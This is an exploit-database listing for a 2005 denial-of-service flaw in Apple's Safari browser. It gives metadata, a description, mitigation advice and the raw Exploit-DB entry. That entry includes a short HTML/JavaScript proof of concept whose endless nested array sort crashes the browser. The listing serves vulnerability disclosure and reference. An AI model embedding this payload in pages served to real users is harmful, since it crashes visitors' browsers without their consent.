header-logo
Suggest Exploit
vendor:
Safari Web Browser
by:
Unknown
5.5
CVSS
MEDIUM
Denial of Service
399
CWE
Product Name: Safari Web Browser
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: NO
Related CWE: CVE-2005-0896
CPE: a:apple:safari
Metasploit:
Other Scripts:
Platforms Tested: macOS
2005

Apple Safari Web Browser Denial of Service Vulnerability

The vulnerability in Apple Safari Web Browser can be exploited by performing an infinite JavaScript array sort operation, leading to a browser crash. It is believed that this vulnerability only causes a denial of service and is not capable of executing arbitrary code, although this has not been confirmed.

Mitigation:

There is currently no known mitigation for this vulnerability. It is recommended to use an alternative web browser until a patch is available.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/11759/info

Apple Safari Web Browser is prone to a vulnerability that may result in a browser crash. This issue is exposed when the browser performs an infinite JavaScript array sort operation. It is conjectured that this will only result in a denial of service and is not further exploitable to execute arbitrary code, though this has not been confirmed.

<HTML>
<SCRIPT> a = new Array(); while (1) { (a = new Array(a)).sort(); } </SCRIPT>
<SCRIPT> a = new Array(); while (1) { (a = new Array(a)).sort(); } </SCRIPT>
</HTML>

Navigation

Suggest Exploit

Services By CQR